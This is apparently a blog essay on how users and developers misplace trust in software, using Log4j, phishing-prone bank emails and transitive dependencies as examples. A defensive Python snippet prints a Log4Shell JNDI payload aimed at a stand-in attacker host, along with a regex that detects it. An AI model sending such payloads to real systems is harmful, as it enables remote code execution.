The Wall Street Journal today posted an article, “Apps with Hidden Data Harvesting Software are Banned by Google,” which is just one of many. I’m not even going to say it’s more egregious than many.
I worked on cybersecurity compliance for the nuclear power industry for a few years. I wasn’t doing the cyber protection itself (I’m not a security administrator, computer or network) but rather the software that enabled them to track all the details per NEI 08-09. I learned a lot more than I ever wanted to know about security, and that includes having worked with classified data (oddly, as a site administrator) in the USAF and having security certifications.
We want to trust; we want to believe that what we download, what we draw in from public repositories, even what we buy, is secure. It’s not.
True malicious code is the exception (otherwise, we’d all be best off going back to plain old telephone service landlines and calculators). There are bad actors and there are those who fight them. Malicious code and active attackers are a known threat.
No less dangerous though are the security risks from honest but mediocre code.
As a recent example that many will know about, the Log4j vulnerability was heavily reported (see the US Cybersecurity & Infrastructure Security Agency report):

This wasn’t a coding bug per se; it was caused by the developers trusting JNDI resources. Most developers and users grant DNS the same implicit trust.
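To make the trust failure concrete: a vulnerable Log4j 2.x would expand a `${jndi:...}` expression found anywhere in a logged message into a live lookup, so untrusted input that merely passed through a log statement could reach out to an attacker’s server. This is a rough sketch, in no way Log4j’s own code, of what screening untrusted input for that payload shape might look like:

```python
import re

# Illustrative only: a vulnerable Log4j 2.x would expand
# "${jndi:ldap://attacker.example/a}" embedded in any logged string into a
# live JNDI lookup. This checker merely flags such payloads in untrusted
# input before it reaches a logger; it is not how Log4j itself works.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

def looks_like_jndi_payload(text: str) -> bool:
    """Return True if text contains a JNDI-style lookup expression."""
    return bool(JNDI_PATTERN.search(text))

# Untrusted input (e.g., an HTTP User-Agent header) that would have been
# logged verbatim by an unsuspecting application:
print(looks_like_jndi_payload("${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_jndi_payload("Mozilla/5.0 ordinary user agent"))    # False
```

The point isn’t that this check is a fix (the real fix was patching Log4j); it’s that the dangerous string looked, to the logger, like any other data it was trusted to handle.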
Thinking about adversarial situations is not what most people do. In the real world, the confidence man takes advantage of this.
Even when the company is honest in what it does, such as a bank or credit card company, it helps teach people to extend trust in dangerous ways. For instance, I’ve received emails from my bank, from some of my credit card companies, and even from some of my fintech services, with links to click that take me straight to my online account.
That’s terrible! If you train users to click links in your emails and then log in, you set them up for phishing attacks!
So, our social and emotional trust is being used against us:
- By malicious actors
- By honest but imperfect developers
- By those trying to make things easier for us
Our trust is being abused constantly.
Perhaps the most pernicious problem … trust is transitive. Our clients trust us, and we trust Log4j. When we fail to protect against a Log4j bug, our clients end up trusting Log4j too, even without knowing it.
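That transitivity is easy to see in a dependency graph. The package names below are invented for illustration: an application declares one direct dependency, yet implicitly trusts everything that dependency pulls in.

```python
# Hypothetical dependency graph (all package names invented):
# each package lists the packages it depends on directly.
DEPS = {
    "my-app":        ["web-framework"],
    "web-framework": ["log4j-core", "json-parser"],
    "log4j-core":    [],
    "json-parser":   ["charset-lib"],
    "charset-lib":   [],
}

def transitive_trust(package: str, deps=DEPS) -> set:
    """Everything `package` implicitly trusts, direct and transitive."""
    trusted, stack = set(), list(deps.get(package, []))
    while stack:
        dep = stack.pop()
        if dep not in trusted:
            trusted.add(dep)
            stack.extend(deps.get(dep, []))
    return trusted

print(sorted(transitive_trust("my-app")))
# my-app never names log4j-core anywhere, yet trusts it all the same.
```

One declared dependency here turns into four trusted packages, and real dependency trees run into the hundreds.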
As painful as it is to have my own errors cause harm … I’m the one the clients see when someone else’s errors, which I brought into the system, cause harm.
I’ve written about reducing dependencies in any given section of code to lower developer load in my article on the pragmatics. I deliberately didn’t address the transitive security risks there, because even without security risks there are costs to every dependency you draw in. Add in security risks and it gets much harder.
We’re not going to “go back” to the old days. We wouldn’t want to. But as we advance into the future, into the Internet of Things (each device with its own 5G connection) and the Metaverse, where everything is distributed among unknown actors, we’re not making our systems more trustworthy and robust.
We’re increasing our risks.
In nature, living organisms each carry their own immune system. They each have their own power generation and distribution system (digestive system, muscles or equivalents). They each have a unique set of components — similar, but not the same. In nature, even a terrible pandemic rarely kills every individual.
But in our modern technology, we interlink everything with shared parts. We do it for “efficiency at scale.” For “cost benefit.” What about the costs of breaches of trust?
If any of our nations decide that developers are legally and financially liable for security breaches caused by their deliverables (as pharmaceutical companies are for biological side effects), that would put a real cost on breaches of trust.
Would any of us still be willing to ship the current software today in such a regulatory/legal world?
Keep the Light,